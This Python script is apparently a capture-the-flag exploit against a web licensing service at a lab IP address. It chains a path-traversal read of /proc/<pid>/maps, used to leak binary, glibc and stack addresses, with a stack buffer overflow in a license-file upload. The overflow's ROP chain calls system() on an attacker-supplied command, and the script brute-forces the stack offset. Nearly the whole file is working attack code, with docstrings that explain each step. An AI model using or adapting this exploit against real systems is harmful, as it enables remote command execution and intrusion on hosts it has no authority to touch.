first_exploit.py
#!/usr/bin/env python3
import re
import requests
import struct
import signal
import sys
import time
# Target host; every request in this script is built from this address.
ip = '10.10.11.154'


def p64(n):
    """Pack integer *n* as an 8-byte little-endian value (``struct`` format ``<Q``)."""
    return struct.pack('<Q', n)


def _on_sigint(*_):
    """Ctrl-C handler: print a short notice and exit with status 1."""
    print('\n[!] Exiting...')
    exit(1)


signal.signal(signal.SIGINT, _on_sigint)
def get_addresses(pid: str) -> tuple[int, int, int]:
    """Leak the ELF, glibc and stack base addresses of process *pid* from the target.

    ``/proc/<pid>/maps`` is fetched through ``index.php?page=...``, so the web
    application presumably resolves ``page`` to an arbitrary local file path
    (a local-file-read / path-traversal weakness). That leak is presumably
    what lets the fixed offsets in ``craft_payload`` work despite ASLR/PIE.
    Each regex runs without DOTALL, so ``.*?`` cannot cross a newline and
    ``[0]`` takes the first mapping line for each path.

    Args:
        pid: target process id, passed through verbatim from the command line.

    Returns:
        ``(elf_base, glibc_base, stack_base)`` as ints parsed from hex.

    Raises:
        IndexError: if any pattern has no match (wrong PID, a libc build other
            than ``libc-2.31.so``, or the file read not working), because
            ``[0]`` is indexed unconditionally. ``requests`` exceptions
            propagate unchanged.
    """
    r = requests.get(f'http://{ip}/index.php?page=/proc/{pid}/maps', allow_redirects=False)
    # Start address of the first mapping line ending in the target binary path.
    elf_base_addr = re.findall(r'(.*?)\-.*?/usr/bin/activate_license', r.text)[0]
    # Pinned to one exact glibc build; the offsets in craft_payload depend on it.
    glibc_base_addr = re.findall(r'(.*?)\-.*?/usr/lib/x86_64-linux-gnu/libc-2.31.so', r.text)[0]
    # Only the '[stack]' mapping base is known, hence the offset sweep in main.
    stack_addr = re.findall(r'(.*?)\-.*?\[stack\]', r.text)[0]
    return int(elf_base_addr, 16), int(glibc_base_addr, 16), int(stack_addr, 16)
def craft_payload(pid: str, cmd: str, stack_offset: int) -> dict[str, tuple[str, bytes]]:
    """Build the multipart ``files`` dict for the license upload.

    Calls :func:`get_addresses` first, so every call performs one HTTP GET
    before the upload is assembled. The uploaded body is, in order:

    * 520 filler bytes (``offset``) — presumably the distance from the start
      of the server-side buffer to the saved return address, i.e. the
      handler copies the uploaded file into a fixed-size stack buffer
      without a length check (the second weakness this script relies on);
    * ``pop_rdi_ret`` — ELF base plus a build-specific gadget offset;
    * ``stack_address + stack_offset`` — guessed address of ``cmd`` once it
      sits on the stack; only the stack base is known from the leak;
    * ``system`` — glibc base plus a build-specific offset;
    * ``cmd`` — 200 spaces, the command, and a NUL terminator. The leading
      spaces are presumably slack so an imprecise ``stack_offset`` guess
      still lands inside the command string.

    The gadget and ``system`` offsets are taken as given here; they are
    specific to the exact binary and ``libc-2.31.so`` build named in
    ``get_addresses``.

    Args:
        pid: target process id, forwarded to :func:`get_addresses`.
        cmd: command string; rebound to ``bytes`` inside the function.
        stack_offset: int added to the leaked stack base.

    Returns:
        ``{'licensefile': ('tmp_name', payload)}`` for ``requests.post(files=...)``.
    """
    elf_address, glibc_address, stack_address = get_addresses(pid)
    # Build-specific constants; not derived from the leak itself.
    pop_rdi_ret = elf_address + 0x0181b
    system = glibc_address + 0x48e50
    padding = b' ' * 200
    # NUL-terminated so the C-side string ends where the command does.
    cmd = padding + cmd.encode() + b'\0'
    offset = 520
    junk = b'A' * offset
    payload = junk
    payload += p64(pop_rdi_ret)
    payload += p64(stack_address + stack_offset)
    payload += p64(system)
    payload += cmd
    return {'licensefile': ('tmp_name', payload)}
def main() -> None:
    """CLI entry point: ``<PID> <cmd> [stack offset (hex)]``.

    With three arguments the given hex offset is used for a single POST to
    ``activate_license.php``; with two, ``stack_offset`` is swept from
    ``0x21000`` down to ``0x80`` in steps of 128, one POST per guess with a
    one-second pause. ``craft_payload`` re-runs the address leak on every
    call, so each guess costs two requests (a GET then a POST).

    Responses are never inspected; success is only observable on the
    out-of-band listener the message refers to. From a defender's side the
    sweep is distinctive: repeated ``index.php?page=/proc/<pid>/maps``
    reads, each followed by an ``activate_license.php`` upload of well over
    700 bytes that is mostly ``A`` bytes, at roughly one-second intervals.

    Raises:
        ValueError: if the optional third argument is not valid hex
            (``int(..., 16)`` is applied without a guard).
    """
    if len(sys.argv) != 3 and len(sys.argv) != 4:
        print(f'[!] Usage: python3 {sys.argv[0]} <PID> <cmd> [stack offset (hex)]')
        return
    pid, cmd = sys.argv[1], sys.argv[2]
    if len(sys.argv) == 4:
        # Single shot with a caller-supplied offset.
        stack_offset = int(sys.argv[3], 16)
        requests.post(f'http://{ip}/activate_license.php',
                      files=craft_payload(pid, cmd, stack_offset))
        print('[+] Sent payload. Check listener')
        return
    print('[+] Starting brute force on stack offset')
    # Descending sweep; the loop never terminates early because no response is checked.
    for stack_offset in range(0x21000, 0, -128):
        print(f'[*] Stack offset: {hex(stack_offset)}')
        time.sleep(1)
        requests.post(f'http://{ip}/activate_license.php',
                      files=craft_payload(pid, cmd, stack_offset))
if __name__ == '__main__':
    # Run the CLI only when executed directly, not when imported.
    main()